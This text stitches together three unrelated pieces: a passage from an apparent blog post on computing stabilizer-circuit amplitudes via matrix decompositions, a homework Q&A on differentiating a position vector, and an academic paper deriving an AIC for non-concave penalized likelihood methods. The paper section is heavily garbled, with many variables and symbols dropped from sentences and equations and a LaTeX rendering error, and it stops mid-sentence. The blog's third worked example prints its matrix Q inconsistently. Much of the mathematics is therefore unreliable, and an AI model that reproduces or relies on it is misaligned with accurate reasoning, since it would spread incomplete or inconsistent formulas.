## The Needed Piece—For Now Chaowen took the lead all through the Fall 2018 term in trying multiple attacks. In the non-alternating case, the change of basis converts ${B}$ into a diagonal matrix ${D}$ over ${\mathbb{F}_2}$. In the alternating case, the same process makes ${D}$ a block-diagonal matrix of the kind we mentioned above. The conversion ${D = Q B Q^\top}$ in both cases also yields ${w}$. Of course ${Q}$ can be computed by Gaussian elimination in ${O(n^3)}$ time, but this is what we wanted to avoid. After poring over older literature on ${n^\omega}$-time methods, including a 1974 paper by James Bunch and John Hopcroft (see also this), we found a paper from last year by Jean-Guillaume Dumas and Clément Pernet that gives exactly what we needed: an LDU-type decomposition that yields ${D}$ in ${O(n^\omega)}$ time. We only needed to apply the change-of-basis analysis in Schmidt’s paper to this decomposition and combine with the normal-form analysis to establish our algorithm for computing the amplitude ${\langle 0^n |C| 0^n \rangle}$: 1. Convert ${C}$ to the classical quadratic form ${f_C}$ with matrix ${S}$ over ${\mathbb{Z}_4}$ and associate the ${n \times n}$ matrix ${B}$ over ${\mathbb{Z}_2}$ as above. This needs only ${O(N)}$ time. 2. Compute the Dumas-Pernet decomposition ${B = PLDL^\top P^\top}$ over ${\mathbb{Z}_2}$ where ${P}$ is a permutation matrix, ${L}$ is lower-triangular, and ${D}$ is block-diagonal with blocks that are either ${1 \times 1}$ or ${2 \times 2}$. Of course, this involves computing the rank ${r}$ of ${B}$ and takes ${O(n^\omega)}$ time. Think of it as ${D = QBQ^\top}$. This takes ${O(n^\omega)}$ time—indeed, ${O(n^2 r^{\omega - 2})}$ time according to Dumas and Pernet. 3. Compute ${D' = Q S Q^\top}$ over ${\mathbb{Z}_4}$. This, too, takes ${O(n^\omega)}$ time. 4. If any diagonal ${1 \times 1}$ block of the original ${D}$ has become ${2}$ in ${D'}$, output ${\langle 0^n |C| 0^n \rangle = 0}$. Else, ${\langle 0^n |C| 0^n \rangle}$ is nonzero and we have enough information about ${D}$ and ${w}$ to find it—in only ${O(n)}$ time, in fact. This proves our main theorem: Theorem 3 For stabilizer circuits ${C}$, ${\langle 0^n |C| 0^n \rangle}$ is computable in ${O(n^\omega)}$ time. So is counting binary solutions to a classical quadratic form over ${\mathbb{Z}_4}$, or any quadratic polynomial mod 2. Because we use the decomposition, the above is not a clean ${O(N)}$-time reduction to computing ${r}$. It does not make Theorem 3 into a linear-time equivalence. By further analysis, however, we show that the only impediment is needing ${D'}$ in step 4 of our algorithm to tell whether ${\langle 0^n |C| 0^n \rangle = 0}$. If we are promised that it is nonzero, then we obtain the probability ${|\langle 0^n |C| 0^n \rangle|^2}$ in ${O(N)}$ time from ${r}$ alone. This is actually where the power of Chaowen’s analysis of the normal forms is brightest and neatest. We will devote further posts to this and to illuminating further connections in graph and matroid theory. ## A Three-Part Example Consider the following quantum circuit ${C}$. OK, this is a very low-tech drawing. Besides the six Hadamard gates it has two ${\mathsf{CZ}}$ gates, which are shown as simple bars since they are symmetric: By the rules given here, the three Hadamard gates at left introduce “nondeterministic variables” ${x_1,x_2,x_3}$. The three Hadamard gates at right also give nondeterministic variables, but they are immediately equated to the output variables ${z_1,z_2,z_3}$ so we skip them. 
The polynomial ${q_C}$ is $\displaystyle 2u_1 x_1 + 2u_2 x_2 + 2u_3 x_3 + 2x_1 x_2 + 2 x_2 x_3 + 2 x_1 z_1 + 2 x_2 z_2 + 2 x_3 z_3.$ Upon substituting ${0}$ for all of ${u_1,u_2,u_3}$ and ${z_1,z_2,z_3}$ this gives simply ${f(x) = 2x_1 x_2 + 2 x_2 x_3}$. This is an alternating form with $\displaystyle S = B = \begin{bmatrix} 0 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix},$ which is the adjacency matrix of the path graph of length 2 on ${n = 3}$ vertices. Gaussian elimination does not need any prior swaps, so the permutation matrix ${P}$ in the decomposition is the identity and we get $\displaystyle Q = \begin{bmatrix} 1 & 0 & 0 \\ 0 & 1 & 0 \\ 1 & 0 & 1 \end{bmatrix}, \quad\text{giving}\quad D = QBQ^\top = \begin{bmatrix} 0 & 1 & 0 \\ 1 & 0 & 0 \\ 0 & 0 & 0 \end{bmatrix}$ as the block-diagonal matrix over ${\mathbb{Z}_2}$. Now we re-compute the products over ${\mathbb{Z}_4}$ to get $\displaystyle Q S Q^{\top} \!\!=\!\! \begin{bmatrix} 1 & 0 & 0 \\ 0 & 1 & 0 \\ 1 & 0 & 1 \end{bmatrix} \!\cdot\! \begin{bmatrix} 0 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix} \!\cdot Q^\top \!=\! \begin{bmatrix} 0 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 2 & 0 \end{bmatrix} \!\cdot\! \begin{bmatrix} 1 & 0 & 1 \\ 0 & 1 & 0 \\ 0 & 0 & 1 \end{bmatrix} \!=\! \begin{bmatrix} 0 & 1 & 0 \\ 1 & 0 & 2 \\ 0 & 2 & 0 \end{bmatrix} \!=\! D'.$ Now ${D'}$ has entries that are ${2}$ but they are off-diagonal, and hence cancel when ${y^\top D' y}$ is computed in the ${y}$-basis. Since ${w}$ is likewise the zero vector, this gives the transformed form as $\displaystyle f'_0(y_1,y_2,y_3) = 2y_1 y_2.$ It is easy to compute that ${f'_0}$ has six values of 0 and two values of 2, which gives the amplitude as the difference ${6 - 2}$ divided by the square root of ${2^6}$, so ${\frac{1}{2}}$, The probability of getting ${000}$ as the result of the measurement is ${\frac{1}{4}}$. Now suppose we insert a ${\mathsf{Z}}$-gate ${\begin{bmatrix} 1 & 0 \\ 0 & -1 \end{bmatrix}}$ on the first qubit to make a new circuit ${C_2}$. Since ${\mathsf{Z}}$ and ${\mathsf{CZ}}$ are diagonal in the standard basis it does not matter where between the Hadamard gates it goes, say: After substituting zeroes the form over ${\mathbb{Z}}$ is ${g = 2x_1 x_2 + 2 x_2 x_3 + 2x_1^2}$. This gives $\displaystyle S = \begin{bmatrix} 2 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix},\quad v = (1,0,0), \quad B = \begin{bmatrix} 0 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix}.$ The matrix ${B}$ is the same as in the first example, hence so are the matrices ${Q}$ and ${D}$ and the alternating status of ${g}$. The difference made by ${v}$ and the resulting ${w}$ makes itself felt when we re-compute over ${\mathbb{Z}_4}$: $\displaystyle Q S Q^{\top} \!\!=\!\! \begin{bmatrix} 1 & 0 & 0 \\ 0 & 1 & 0 \\ 1 & 0 & 1 \end{bmatrix} \!\cdot\! \begin{bmatrix} 2 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix} \!\cdot Q^\top \!=\! \begin{bmatrix} 2 & 1 & 0 \\ 1 & 0 & 1 \\ 2 & 2 & 0 \end{bmatrix} \!\cdot\! \begin{bmatrix} 1 & 0 & 1 \\ 0 & 1 & 0 \\ 0 & 0 & 1 \end{bmatrix} \!=\! \begin{bmatrix} 2 & 1 & 2 \\ 1 & 0 & 2 \\ 2 & 2 & 2 \end{bmatrix} \!=\! D'.$ Well, ${D'}$ is far from diagonal—perhaps we shouldn’t use that name—but again the off-diagonal ${2}$s are innocuous so we really have $\displaystyle D'' = \begin{bmatrix} 2 & 1 & 0 \\ 1 & 0 & 0 \\ 0 & 0 & 2 \end{bmatrix}.$ The ${2}$ at upper left does not zero out the amplitude, because it is within a ${2 \times 2}$ block. 
The ${2}$ at lower right, however, constitutes a ${1 \times 1}$ block of ${D''}$, so it signifies that ${000}$ is not a possible measurement outcome. Essentially what has happened is that in the ${y}$-basis the form has become $\displaystyle g'(y) = 2y_1^2 + 2y_1 y_2 + 2y_3^2.$ The isolated term in ${y_3}$ contributes ${+2}$ mod ${4}$ to half the ${0}$${1}$ assignments so as to cancel the other half, leaving a difference of ${0}$ in the numerator of the amplitude. For the third example, let us insert a phase gate ${\mathsf{S}}$ after the ${\mathsf{Z}}$ to make a circuit ${C_3}$: The ${\mathsf{ZS}}$ combination is the same as ${\mathsf{S^*}}$, the adjoint (and inverse) of ${\mathsf{S}}$. Now after substitutions we have ${h_{C_3}(x) = 2x_1 x_2 + 2 x_2 x_3 + 3x_1^2}$, giving: $\displaystyle S = \begin{bmatrix} 3 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix},\quad v = (1,0,0), \quad B = \begin{bmatrix} 1 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix}.$ Note that ${B}$ is still a 0-1 matrix. This ${B}$ has full rank. Again it helps our exposition that ${B}$ is diagonalizable without swaps (and that the inverse of an invertible lower-triangular matrix is lower-triangular), so we can find ${QBQ^\top = D = I}$ with $\displaystyle Q = \begin{bmatrix} 1 & 0 & 0 \\ 1 & 1 & 0 \\ 1 & 1 & 1 \end{bmatrix}.$ In the ${y}$-basis we get ${h'(y) = y_1 + y_2 + y_3 + 2(y \bullet w)}$ for some ${w}$. To test for zero amplitude—before we know what ${w}$ is—we compute in ${\mathbb{Z}_4}$: $\displaystyle Q S Q^{\top} \!\!=\!\! \begin{bmatrix} 1 & 0 & 0 \\ 1 & 1 & 0 \\ 0 & 1 & 1 \end{bmatrix} \!\cdot\!\begin{bmatrix} 3 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix} \!\cdot Q^{\top} \!=\! \begin{bmatrix} 3 & 1 & 0 \\ 0 & 1 & 1 \\ 0 & 2 & 1 \end{bmatrix} \!\cdot\! \begin{bmatrix} 1 & 1 & 1 \\ 0 & 1 & 1 \\ 0 & 0 & 1 \end{bmatrix} \!=\! \begin{bmatrix} 3 & 0 & 0 \\ 0 & 1 & 2 \\ 0 & 2 & 3 \end{bmatrix} \!=\! D'.$ Again we can ignore the off-diagonal ${2}$‘s. There is no ${2}$ on the main diagonal, so we know the amplitude is non-zero. To compute it, we only need the information on the diagonal, which tells us ${h'_0(y) = y_1 + y_2 + y_3}$ and ${w = (1,0,1)}$ in the transformed basis. Note that we could have written ${h'_0(y)}$ down the moment we learned that ${B}$ has rank ${3}$ over ${\mathbb{F}_2}$, so ${w}$ is the only rigmarole. The final analysis—using a recursion detailed in the appendix of our paper—gives the amplitude as $\displaystyle \frac{2 - 2i}{8} = \frac{1 - i}{4},$ and so the probability of the output ${000}$ is ${\frac{1}{8}}$. We remark finally that ${w}$ is generally not the same as ${Qv}$. To see where it comes from, let us now compute ${Q B Q^{\top}}$ (not ${QSQ^\top}$) over ${\mathbb{Z}_4}$ to get ${QBQ^\top = D + 2U}$. Then $\displaystyle \begin{array}{rcl} f(x) &=& x^\top B x + 2x^\top v = x^\top Q^{-1} (D+2U) (Q^\top)^{-1} x + 2x^\top (Q^{-1} Q) v\\ &=& y^\top (D + 2U) y + 2 y^\top Qv, \end{array}$ where ${y = (Q^\top)^{-1} x}$. Now off-diagonal elements in ${2U}$ will cancel when taking ${2 y^\top U y}$ modulo 4, so we need only retain the diagonal ${u}$ of ${U}$ as a binary vector. Since ${y}$ is binary, ${y^\top \mathit{diag}(u) y = y^\top u}$. This finally gives $\displaystyle f(x) = y^\top D y + 2y^\top (u + Qv) = y^\top D y + 2(y \bullet w)$ with ${w = u + Qv}$. 
In the third example we have ${Qv = (1,1,1)}$ and $\displaystyle QBQ^{\top} = \begin{bmatrix} 1 & 0 & 0 \\ 1 & 1 & 0 \\ 1 & 1 & 1 \end{bmatrix} \cdot \begin{bmatrix} 1 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix} \cdot Q^\top = \begin{bmatrix} 1 & 1 & 0 \\ 2 & 1 & 1 \\ 2 & 2 & 1 \end{bmatrix} \cdot \begin{bmatrix} 1 & 1 & 1 \\ 0 & 1 & 1 \\ 0 & 0 & 1 \end{bmatrix} = \begin{bmatrix} 1 & 2 & 2 \\ 2 & 3 & 0 \\ 2 & 0 & 1 \end{bmatrix}.$ The diagonal gives ${u = (0,1,0)}$ and so ${w = u + Qv \pmod{2} = (1,0,1)}$. This agrees with what we read off above by comparing ${D'}$ with ${D}$. There is a different worked-out example for the triangle graph on three vertices in the paper. Chaowen and I continue to be interested in shortcuts to computing the amplitude and/or probability. Here we take a cue from how Volker Strassen titled his famous 1969 paper on matrix multiplication: “Gaussian Elimination is not Optimal.” We would like to find cases where we can say, “Matrix Multiplication is not Optimal.” In view of recent papers blunting efforts to show ${\omega = 2}$—see this post—the question may shift to which computations may not need the full power of matrix multiplication and be achievable in ${O(n^2)}$ time after all. This applies to computing the rank (over ${\mathbb{Z}_2}$) itself, and the question extends to sparse cases like those considered in the paper, “Fast Matrix Rank Algorithms and Applications,” by Ho Yee Cheung, Tsz Chiu Kwok, and Lap Chi Lau. The second circuit in the above example corresponds to a graph with a self-loop at node 1—or, depending on how one counts incidence of self-loops in undirected graphs, one could call it a double self-loop. It exemplifies circuits used to create quantum graph states, and those circuits are representative of stabilizer circuits in general. The third circuit can be said to have a “triple loop,” or maybe better, a “3/2-loop”—while if the original ${\mathsf{Z}}$-gate were a single ${\mathsf{S}}$-gate giving the form ${x_1^2 + 2x_1 x_2 + 2 x_2 x_3}$, we would face the ambiguity of calling it a “loop” or a “half-loop.” Sorting this out properly needs going beyond graph theory. In upcoming posts, Chaowen and I will say more about how all this yields new problems in graph theory and new connections between quantum computing and matroid theory. ## Open Problems What do our results say about the problem of computing the rank of a matrix, and possibly separating it from dependence on matrix multiplication? We hope that we have begun to convey how our paper uncovers a lot of fun computational mathematics. We are grateful for communications from people we’ve approached (some acknowledged in our paper) about possible known connections, but there may be more we don’t know. Our next posts will say more about combinatorial aspects of quantum circuits. 1. June 5, 2019 2:07 am His name is Clément Pernet, not “Clemens” Pernet ;-). • June 5, 2019 7:21 am Oops, thanks!
# The position vector of a particle is given by r(t)=t^3*i+t^2*j. What are its velocity, speed, and acceleration when t=2?

Tushar Chandra | Certified Educator since 2010 | Top subjects are Math, Science, and Business

We have the position vector given in terms of time t.

r(t) = t^3*i + t^2*j

To find the velocity vector we have to differentiate r(t) with respect to time.

r'(t) = 3t^2*i + 2t*j

The vector representing acceleration is the derivative of the velocity vector, i.e., the second derivative of the position vector.

r''(t) = 6t*i + 2*j

When time t = 2, the velocity vector is 3*2^2*i + 2*2*j => 12*i + 4*j

The speed is the absolute value of the velocity vector, or sqrt(12^2 + 4^2) = sqrt(144 + 16) = sqrt 160

The acceleration vector is 6*2*i + 2*j => 12*i + 2*j

The required acceleration at t=2 is 12*i + 2*j and the speed is sqrt 160.

Approved by eNotes Editorial

giorgiana1976 | Student

The velocity is given by the 1st derivative of r(t). We'll differentiate r(t) with respect to t.

v(t) = r'(t) = 3t^2*i + 2t*j

The acceleration is given by the 1st derivative of v(t). We'll differentiate v(t) with respect to t.

a(t) = v'(t) = 6t*i + 2j

The speed is:

|v(t)| = sqrt[(3t^2)^2 + (2t)^2]
|v(t)| = sqrt(9t^4 + 4t^2)

We'll put t = 2 and we'll get:

v(2) = 3*(2)^2*i + 4*j
v(2) = 12i + 4j
a(2) = 12i + 2j
|v(2)| = sqrt(144 + 16)
|v(2)| = sqrt(160)
|v(2)| = 4sqrt10

The velocity and acceleration of the particle, when t=2, are: v(2) = 12i + 4j ; a(2) = 12i + 2j and |v(2)| = 4sqrt10.
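For readers who want to double-check the differentiation, here is a small SymPy sketch (my own verification, not part of the answers above) that reproduces the velocity, acceleration, and speed at t = 2.

```python
import sympy as sp

t = sp.symbols('t')
# Position components for r(t) = t^3 i + t^2 j
r = sp.Matrix([t**3, t**2])

v = r.diff(t)                 # velocity vector (3t^2, 2t)
a = v.diff(t)                 # acceleration vector (6t, 2)
speed = sp.sqrt(v.dot(v))     # sqrt(9t^4 + 4t^2)

print(v.subs(t, 2))                    # Matrix([[12], [4]])
print(a.subs(t, 2))                    # Matrix([[12], [2]])
print(sp.simplify(speed.subs(t, 2)))   # 4*sqrt(10)
```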
AIC for the Non-concave Penalized Likelihood Method

Abstract

Non-concave penalized maximum likelihood methods, such as the Bridge, the SCAD, and the MCP, are widely used because they not only perform the parameter estimation and variable selection simultaneously but also are more efficient than the Lasso. They include a tuning parameter which controls the penalty level, and several information criteria have been developed for selecting it. While these criteria assure the model selection consistency, they have a problem in that there are no appropriate rules for choosing one from the class of information criteria satisfying such a preferred asymptotic property. In this paper, we derive an information criterion based on the original definition of the AIC by considering minimization of the prediction error rather than model selection consistency. Concretely speaking, we derive a function of the score statistic that is asymptotically equivalent to the non-concave penalized maximum likelihood estimator and then provide an estimator of the Kullback-Leibler divergence between the true distribution and the estimated distribution based on the function, whose bias converges in mean to zero. Furthermore, through simulation studies, we find that the performance of the proposed information criterion is about the same as or even better than that of cross-validation.

KEY WORDS: information criterion; Kullback-Leibler divergence; regularization; statistical asymptotic theory; tuning parameter; variable selection.

1 Introduction

The Lasso (Tibshirani 1996) is a regularization method that imposes an $\ell_1$ penalty term on an estimating function with respect to an unknown parameter vector $\beta$, where $\lambda$ is a tuning parameter controlling the penalty level. The Lasso can simultaneously perform estimation and variable selection by exploiting the non-differentiability of the penalty term at the origin. Concretely speaking, if $\hat{\beta}_{\lambda}$ is the estimator based on the Lasso, several of its components will shrink to exactly 0 when $\lambda$ is not close to 0. However, parameter estimation based on the Lasso is not necessarily efficient, because the Lasso shrinks the estimator toward the zero vector too much. To avoid such a problem, it has been proposed to use a penalty term that does not shrink estimates with large values. Typical examples of such regularization methods are the Bridge (Frank and Friedman 1993), the smoothly clipped absolute deviation (SCAD; Fan and Li 2001), and the minimax concave penalty (MCP; Zhang 2010). Whereas the Bridge uses an $\ell_q$ penalty term ($0 < q \leq 1$), the SCAD and the MCP use penalty terms that can be approximated by an $\ell_1$ penalty term in the neighborhood of the origin, which we call an $\ell_1$ type. Although it is difficult to obtain estimates of them as their penalties are non-convex, there are several algorithms, such as the coordinate descent method and the gradient descent method, that assure convergence to a locally optimal solution. On the other hand, in the above regularization methods, we have to choose a proper value for the tuning parameter $\lambda$, and this is an important task for appropriate model selection. One of the simplest ways of selecting $\lambda$ is to use cross-validation (CV; Stone 1974). The stability selection method (Meinshausen and Bühlmann 2010), which uses subsampling in order to avoid the problems caused by selecting a model based on only one value of $\lambda$, would also be attractive, but it carries a considerable computational cost, as does CV.
Recently, information criteria without such a problem have been developed (Yuan and Lin 2007; Wang et al. 2007, 2009; Zhang et al. 2010; Fan and Tang 2013). Here, letting $\sum_{i=1}^{n} g_i(\beta)$ be the log-likelihood function and $\hat{\beta}_{\lambda}$ be the estimator of $\beta$ obtained by the above regularization methods, their information criteria take the form of $-2\sum_{i=1}^{n} g_i(\hat{\beta}_{\lambda})$ plus the number of nonzero coefficients in $\hat{\beta}_{\lambda}$ multiplied by some positive sequence. Accordingly, model selection consistency is at least assured for some choice of this sequence that depends on at least the sample size $n$. For example, the information criterion with the sequence $\log n$ is proposed as the BIC. This approach includes results for the case in which the dimension of the parameter vector goes to infinity, and hence it is considered to be significant. However, the choice of the sequence remains somewhat arbitrary. That is, there is a class of sequences assuring a preferred asymptotic property such as model selection consistency, but there are no appropriate rules for choosing one from the class. For example, since the BIC described above is not derived from the Bayes factor, there is no reason to use $\log n$ rather than, say, $2\log n$. This is a severe problem because data analysts can choose the sequence arbitrarily and do model selection as they want. Information criteria without such an arbitrariness problem have been proposed by Efron et al. (2004) or Zou et al. (2007) for Gaussian linear regression and by Ninomiya and Kawano (2014) for generalized linear regression. Concretely speaking, on the basis of the original definition of the $C_p$ or the AIC, they derive an unbiased estimator of the mean squared error or an asymptotically unbiased estimator of a Kullback-Leibler divergence. However, these criteria are basically only for the Lasso. In addition, the asymptotic setting used in Ninomiya and Kawano (2014) does not assure even estimation consistency. Our goal in this paper is to derive an information criterion based on the original definition of the AIC in an asymptotic setting that assures estimation consistency for regularization methods using non-concave penalties, including the Bridge, the SCAD, and the MCP. To achieve it, the results presented in Hjort and Pollard (1993) are slightly extended to derive an asymptotic property for the estimator. Then, for the Kullback-Leibler divergence, we construct an asymptotically unbiased estimator by evaluating the asymptotic bias between the divergence and the log-likelihood into which the estimator is plugged. Moreover, we verify that this evaluation is the asymptotic bias in the strict sense; that is, the bias converges in mean to the evaluation. This sort of verification has usually been ignored in the literature (see, e.g., Konishi and Kitagawa 2008). The rest of the paper is organized as follows. Section 2 introduces the generalized linear model and the regularization method, and it describes some of the assumptions for our asymptotic theory. In Section 3, we discuss the asymptotic property of the estimator obtained from the regularization method, and in Section 4, we use it to evaluate the asymptotic bias, which is needed to derive the AIC. In Section 5, we discuss the moment convergence of the estimator to show that the bias converges in mean to our evaluation. Section 6 presents the results of simulation studies showing the validity of the proposed information criterion for several models, and Section 7 gives concluding remarks and mentions future work. The proofs are relegated to the appendixes. 
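The criterion derived in this paper requires the asymptotics developed below, but the practical workflow it targets, namely picking the tuning parameter $\lambda$ by an information criterion instead of by cross-validation, can be illustrated with off-the-shelf tools. The Python sketch below uses scikit-learn's Lasso path on simulated Gaussian data (all settings chosen arbitrarily) to compare an AIC-based choice of $\lambda$ with a cross-validated one; it only illustrates the comparison being made and is not an implementation of the criterion proposed here.

```python
import numpy as np
from sklearn.linear_model import LassoLarsIC, LassoCV

rng = np.random.default_rng(0)

# Simulated sparse Gaussian linear model (settings chosen arbitrarily).
n, p = 200, 20
X = rng.normal(size=(n, p))
beta_true = np.zeros(p)
beta_true[:3] = [2.0, -1.5, 1.0]          # only the first three coefficients are nonzero
y = X @ beta_true + rng.normal(size=n)

# Tuning-parameter selection by an AIC-type criterion along the Lasso path...
aic_model = LassoLarsIC(criterion="aic").fit(X, y)
# ...and by 5-fold cross-validation, the computationally heavier alternative.
cv_model = LassoCV(cv=5).fit(X, y)

print("lambda chosen by AIC:", aic_model.alpha_)
print("lambda chosen by CV: ", cv_model.alpha_)
print("nonzero coefficients (AIC):", np.flatnonzero(aic_model.coef_))
print("nonzero coefficients (CV): ", np.flatnonzero(cv_model.coef_))
```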
2 Setting and assumptions for asymptotics Let us consider a natural exponential family with a natural parameter in for an -dimensional random variable , whose density is f(y;θ)=exp{yTθ−a(θ)+b(y)} with respect to a -finite measure. We assume that is the natural parameter space; that is, in satisfies . Accordingly, all the derivatives of and all the moments of exist in the interior of , and, in particular, and . For a function , we denote and by and , respectively. We also assume that is positive definite, and hence, is a strictly convex function with respect to . Let be the -th set of responses and regressors ; we assume that are independent -dimensional random vectors and in are -matrices of known constants. We will consider generalized linear models with natural link functions for such data (see McCullagh and Nelder 1989); that is, we will consider a class of density functions for ; thus, the log-likelihood function of is given by gi(β)=yTiXiβ−a(Xiβ)+b(yi), where is a -dimensional coefficient vector and is an open convex set. To develop an asymptotic theory for this model, we assume two conditions about the behavior of , as follows: • is a compact set with for all and . • There exists an invariant distribution on . In particular, converges to a positive-definite matrix . In the above setting, we can prove the following lemma. Lemma 1. Let be the true value of . Then, under conditions (C1) and (C2), we obtain the following: • There exists a convex and differentiable function such that for each . • converges to . • . See Ninomiya and Kawano (2014) for the proof. Note that we can explicitly write h(β)=∫X[a′(Xβ∗)TX(β∗−β)−{a(Xβ∗)−a(Xβ)}]μ(dX) (1) since we assume (C2), and hence, we can prove its convexity and differentiability without using the techniques of convex analysis (Rockafellar 1970). Let us consider a non-concave penalized maximum likelihood estimator, ^βλ=argminβ∈B{−n∑i=1gi(β)+n1/2p∑j=1pλ(βj)}, (2) where is a tuning parameter and is a penalty term with respect to , which is not necessarily convex. Letting , we assume that satisfies the following conditions; hereafter, we call it an type: • is not differentiable only at the origin, symmetric with respect to , and monotone non-decreasing with respect to . • . Such penalty terms for the Bridge, the SCAD, and the MCP are pBridgeλ(β) =λ|β|q, pSCADλ(β) =λ|β|1{|β|≤(r+1)λ}−(|β|−λ)2/(2r)1{λ<|β|≤(r+1)λ}+λ2(1+r/2)1{|β|>(r+1)λ}, and pMCPλ(β) =rλ2/2−(rλ−|β|)2/(2r)1{|β|≤rλ}, where and . The Bridge penalty is the Lasso penalty itself when , and it has the property that the derivative at the origin diverges when . For the SCAD and MCP penalties, condition (C4) on the behavior in the neighborhood of the origin is satisfied by setting , just like in the Lasso penalty. Thus, it is easy to imagine that a lot of penalties satisfy these conditions. Note that by using such penalties, several components of tend to exactly 0 because of the non-differentiability at the origin. Also note that is assumed not to depend on the subscript of the parameter for simplicity; this is not essential. While Ninomiya and Kawano (2014) put on the penalty term, we put on it in this study. From this, we can prove estimation consistency. Moreover, we can prove weak convergence of , although the asymptotic distribution is not normal in general. 3 Asymptotic behavior 3.1 Preparations Although the objective function in (2) is no longer convex because of the non-convexity of , the consistency of can be derived by using a similar argument to the one in Knight and Fu (2000). 
First, the following lemma holds. Lemma 2. is a consistent estimator of , that is, under conditions (C1)–(C4). This lemma is proved through uniform convergence of the random function, μn(β)=1nn∑i=1{gi(β∗)−gi(β)}−1n1/2p∑j=1{pλ(β∗j)−pλ(βj)}. (3) The details are given in Section A.1. Hereafter, we will denote by so long as there is no confusion. In addition, we denote and by and , respectively. Moreover, the vector and the matrix will be denoted by and , respectively, and we will sometimes express, for example, as . To develop the asymptotic property of the penalized maximum likelihood estimator in (2), which will be used to derive an information criterion, we need to make a small generalization of the result in Hjort and Pollard (1993), as follows: Lemma 3. Suppose that is a strictly convex random function that is approximated by . Let be a subvector of , and let and be continuous functions such that and converge to and uniformly over and in any compact set, respectively, and assume that is convex and . In addition, for νn(u)=ηn(u)+ϕn(u)+ψn(u†)and~νn(u)=~ηn(u)+ϕ(u)+ψ(u†), let and be the argmin of and , respectively, and assume that is unique and . Then, for any , and , there exists such that P(|un−~un|≥δ)≤P(2Δn(δ)+ε≥Υn(δ))+P(|un−~un|≥ξ)+P(|u†n|>γ), (4) where Δn(δ)=sup|u−~un|≤δ|νn(u)−~νn(u)|andΥn(δ)=inf|u−~un|=δ~νn(u)−~νn(~un). (5) Hjort and Pollard (1993) derived an inequality ; they assumed that is convex. Although is non-convex (hence is too), we will use the fact that converge to over . In fact, if is sufficiently large, the inequality satisfied by the convex function is approximately satisfied for ; that is, we have (1−δ/l)ϕn(~un)+(δ/l)ϕn(u)−ϕn(~un+δw)>−ε/2 (6) in . Here, is a unit vector such that , and is in , since . Moreover, if is sufficiently small and is sufficiently large, since , we have (1−δ/l)ψn(~u†n)+(δ/l)ψn(u†)−ψn(~u†n+δw†)>−ε/2 (7) in . Hence, we can show that P(|u†n|≤γ,δ≤|un−~un|≤ξ)≤P(2Δn(δ)+ε≥Υn(δ)) (8) in the same way as in Hjort and Pollard (1993), from which we obtain the above lemma. See Section A.2 for the details. 3.2 Limiting distribution We use Lemma 3 to derive the asymptotic property of the penalized maximum likelihood estimator in (2). Because the asymptotic property depends on the value of , we will develop our argument by setting . Furthermore, we will use for the sake of simplicity. Let us define a strictly convex random function, ηn(u(1),u(2))=n∑i=1{gi(β∗(1),β∗(2))−gi(u(1)n~q,u(2)n1/2+β∗(2))} (9) and ~ηn(u(1),u(2))=−u(2)Ts(2)n+u(2)TJ(22)u(2)/2, (10) where . By making a Taylor expansion around , can be expressed as −n∑i=1{1n~qu(1)Tg′(1)i(β∗)+1n1/2u(2)Tg′(2)i(β∗)} −n∑i=1{12n2~qu(1)Tg′′(11)i(β∗)u(1)+1n~q+1/2u(1)Tg′′(12)i(β∗)u(2)+12nu(2)Tg′′(22)i(β∗)u(2)} plus . Note that the term converges to from (R2), and the terms including reduce to . Accordingly, we see that is asymptotically equivalent to . Next, letting be and letting ϕn(u)=n1/2∑j∈J(2){pλ(ujn1/2+β∗j)−pλ(β∗j)} (11) and ψn(u†)=n1/2∑j∈J(1)pλ(ujn~q), (12) we can see from (C3) and (C4) that and uniformly converge to a function, ϕ(u)=u(2)Tp′(2)λandψ(u†)=λ∥u(1)∥qq, (13) over in a compact set, respectively, where . In addition, letting and , we see that the argmins of and are given by (u(1)n,u(2)n)=(n~q^β(1)λ,n1/2(^β(2)λ−β∗(2)))and(~u(1)n,~u(2)n)=(0,J(22)−1(s(2)n−p′(2)λ)). Note that is not convex but satisfies that . 
Using Lemma 3 together with the above preliminaries, we find that, for any , and , there exists such that P(|(u(1)n,u(2)n−~u(2)n)|≥δ) ≤P(2Δn(δ)+ε≥Υn(δ))+P(|(u(1)n,u(2)n−~u(2)n)|≥ξ)+P(|u(1)n|>γ), (14) where and are the functions defined in (5). The triangle inequality, the convexity of and the uniform convergence of and imply Δn(δ)≤ sup|(u(1),u(2)−~u(2)n)|≤δ|ηn(u(1),u(2))+u(2)Ts(2)n−u(2)TJ(22)u(2)/2| +sup|(u(1),u(2)−~u(2)n)|≤δ|ϕn(u)−ϕ(u)|+sup|(u(1),u(2)−~u(2)n)|≤δ|ψn(u†)−ψ(u†)| \lx@stackrelp→ 0. (15) Let be half the smallest eigenvalue of . Then, a simple calculation gives Υn(δ)=inf|(u(1),u(2)−~u(2)n)|=δ{λ∥u(1)∥qq+(u(2)−~u(2)n)TJ(22)(u(2)−~u(2)n)/2}≥min{λδq,ρδ2}. (16) From (15) and (16), by considering a sufficiently small and a sufficiently large , the first term on the right-hand side in (14) can be made arbitrarily small. In addition, we can generalize the result in Radchenko (2005) with respect to the model and the penalty term; thus, for any , we have P(|u(1)n|≤γ)→1and|un−~un|=Op(1). (17) See Section A.3 for the proof of (17). From this, by considering a sufficiently large and a sufficiently large , the second and third terms on the right-hand side in (14) can be made arbitrarily small. Thus, we conclude that u(1)n=op(1)andu(2)n=~u(2)n+op(1). Theorem 1. Let and Missing or unrecognized delimiter for \left (18) Under conditions (C1)–(C4), we have n1/(2q)^β(1)λ=op(1)andn1/2(^β(2)λ−β∗(2))=J(22)−1(s(2)n−p′(2)λ)+op(1) when , and we have n1/2^β(1)λ=^u(1)n+op(1) (19) and n1/2(^β(2)λ−β∗(2))=−J(22)−1J(21)^u(1)n+J(22)−1(s(2)n−p′(2)λ)+op(1) (20) when . We can obtain the result for the case of in almost 